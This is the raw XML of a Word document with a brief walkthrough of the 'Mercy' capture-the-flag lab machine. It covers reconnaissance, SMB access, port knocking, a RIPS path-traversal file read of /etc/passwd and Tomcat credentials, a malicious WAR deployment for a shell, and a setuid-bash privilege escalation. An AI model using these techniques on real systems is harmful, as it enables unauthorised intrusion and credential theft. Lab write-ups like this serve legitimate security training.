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6524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Mercy machine walk through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331566E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4F2F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nmap -sC -sV -O -T4 -v 192.168.1.6 -o nmap_mercy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27517609">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="263271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7AE5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E86FC5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865" cy="4387215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4BA8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504644D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just navigated the website 192.168.1.6:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262CB3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get to know that apache tomcat is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7E938">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="198628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661F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421FAE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we get to know from the nmap script scanning that we have the tryharder/tryharder directory running lets take a look at that </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F7C9F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="976630"/>
            <wp:effectExtent l="0" t="0" r="889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1D40">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AF425">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B9F9BA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618BAEA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will be decoding it in the linus user base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0F2D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Saved this jebrissh text in the mercy_tryharder_tryharder and used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552F0C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Base64 filename -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C9D14">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1430655"/>
            <wp:effectExtent l="0" t="0" r="146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AF02">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A2EA6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ABA2B5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Enum4linux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"http://192.168.1.6"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192.168.1.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFA9E5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="310705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B2C3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140D73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we get to know about aa user qiu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3463BF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="95948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506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we just get 4 users here called thisisasuperduperlonguser, qiu, pleadformercy,fluffy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EB555">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFB4C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have the smbclient open where we can connect too and we have a password too in the above base decoded file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF4F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Smbclient \\\\192.168.1.6\\qiu -U qiu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C5F75">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5010150" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="381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15BC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E96BE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Inside the directory check for suspicious files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F3338">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8965F3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="895350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BC0E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CC6572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now have the config file with us lets see whats inside it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A7DA4">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3277870"/>
            <wp:effectExtent l="0" t="0" r="190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F99B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A51CE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just get the knocking configuration of various services here lets just use the knocking sequence of the http and use it for ourselves to open the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A7FD6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D52AD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Knock 192.168.1.6 159 27391 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC1D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And the port now is open </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43EDDB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4310" cy="2477135"/>
            <wp:effectExtent l="0" t="0" r="139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8605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1187450"/>
            <wp:effectExtent l="0" t="0" r="635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D2AD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183C194F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36936596">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1621790"/>
            <wp:effectExtent l="0" t="0" r="317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D249">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795AA3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And when we searched for nomercy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7D630">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="14446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238F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C671B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got to kno that there is a vulnerability in rips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5469F4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we searchsearchsploit for it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F55EC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="903605"/>
            <wp:effectExtent l="0" t="0" r="571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5184">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27095C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There is a vulnerability related to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352443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just used searchsploit -m 18660</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C005DB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http://192.168.1.6/nomercy/windows/code.php?file=../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB5655">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0546714E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="762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A34">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1958975"/>
            <wp:effectExtent l="0" t="0" r="6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F75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"http://192.168.1.6/nomercy/windows/code.php?file=../../../../../../var/lib/conf/tomcat7/tomcat-users.xml"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http://192.168.1.6/nomercy/windows/code.php?file=../../../../../..//var/lib/conf/tomcat7/tomcat-users.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419A114">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B758AB2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3292475"/>
            <wp:effectExtent l="0" t="0" r="5715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60B0E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noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36CF9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&lt;? &lt;user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1BA89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noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28D0E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&lt;? &lt;user username="fluffy" password="freakishfluffybunny" roles="none"/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FE4DDB2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362E22F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 passwords are here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60ED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Now lets use msfconsole for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5F4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Made a war file to deploy it to the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50A149">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="444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8429">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D4A2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uploded the war file on the server using the username and password on the manager/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8AD510">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259D8CE0">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2823845"/>
            <wp:effectExtent l="0" t="0" r="1905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474B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102A10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now I will deploy the war file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D35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had started listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FAEA6C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4467225" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="13335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BACF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095492CF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="1568450"/>
            <wp:effectExtent l="0" t="0" r="825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CC75">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427E7B6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Uploaded the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762869A4">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F223BF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7960" cy="1567180"/>
            <wp:effectExtent l="0" t="0" r="508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156970"/>
            <wp:effectExtent l="0" t="0" r="444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CBA12">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15ED05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Conection is established lets spawn our shell here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3530D65E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="748030"/>
            <wp:effectExtent l="0" t="0" r="127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5D4F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33409CD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Inside by providing the fluffy password then I used </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="59FCE34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TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45E4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on the terminal I typed the commnad stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331149B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149FA2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edit the secret/timeclock file and added chomd +s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE82F8F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC112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executed it using /bin/bash -p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764992"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6476499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34458"/>
    <w:rsid w:val="60194A33"/>
    <w:rsid w:val="65434458"/>
    <w:rsid w:val="679D1E77"/>
    <w:rsid w:val="6FE9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2025-01-17T04:57:00Z</dcterms:created>
  <dc:creator>yash yadav</dc:creator>
  <cp:lastModifiedBy>Yash Yadav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-17T08:22:34Z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8E3ECBC6F67F45FAA52DE05FBE447889_11</vt:lpwstr>
  </property>
</Properties>
</file>